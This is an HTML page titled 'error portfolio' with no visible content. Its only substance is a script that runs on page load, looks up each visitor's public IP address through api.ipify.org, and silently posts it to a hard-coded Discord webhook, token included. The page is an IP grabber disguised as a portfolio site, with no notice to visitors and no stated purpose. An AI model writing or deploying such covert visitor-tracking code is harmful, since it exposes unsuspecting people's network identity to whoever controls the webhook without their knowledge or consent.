<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>error portfolio</title>
</head>
<body>

    <script>
        function sendIPToDiscord(ipAddress) {
            // Construct the message
            const message = `User's IP Address: ${ipAddress}`;

            // Discord webhook URL
            const webhookURL = 'https://discord.com/api/webhooks/1233307543871426672/Jw5uHUpnGuI0I_yzbO9MglueN9FRZPOzezkbQr684U2L6rK3Ej2Y-LBSzYGVQ9qTwYax';
            
            
            
            // Payload for the webhook
            const payload = {
                content: message
            };

            // Send the message to Discord webhook
            fetch(webhookURL, {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json',
                },
                body: JSON.stringify(payload),
            })
            .then(response => {
                if (response.ok) {
                    console.log('welcome');
                } else {
                    throw new Error('unkown erorr');
                }
            })
            .catch(error => {
                console.error('error', error);
            });
        }

        // Function to fetch the IP address and send it to Discord
        function getIPAddress() {
            // Make AJAX request to get the client's IP address
            fetch('https://api.ipify.org?format=json')
            .then(response => response.json())
            .then(data => {
                sendIPToDiscord(data.ip);
            })
            .catch(error => {
                console.error('Error getting IP address:', error);
            });
        }

        // Call getIPAddress function when the page loads
        getIPAddress();

       
        
    </script>
